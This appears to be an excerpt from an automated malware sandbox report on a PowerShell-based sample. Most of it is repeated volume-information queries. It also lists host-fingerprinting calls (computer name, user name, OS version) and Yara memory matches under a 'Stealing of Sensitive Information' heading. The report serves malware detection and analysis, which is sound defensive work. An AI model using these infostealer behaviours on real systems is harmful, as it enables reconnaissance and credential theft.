                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,18_2_00407C79
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00406B06 GetVersionExA,18_2_00406B06

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000002.2751486587.0000000008A87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2252250805.0000000007437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3849765879.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3123710586.0000000008723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4282483846.0000000008707000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3517844786.0000000008AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3139004207.0000000008EE7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3521971926.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.2740109130.0000000008561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2577352879.00000000089BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4705414625.00000000086A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2897148363.0000000006D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3545950157.00000000090E7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3891764993.0000000009467000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2409566174.0000000007820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3788098301.000000000769E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2925202742.0000000008637000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4640955762.0000000007E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4202711770.0000000007E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3395971094.0000000008E87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2416886326.0000000009047000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2582377571.0000000008F57000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3369936433.00000000086E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTR
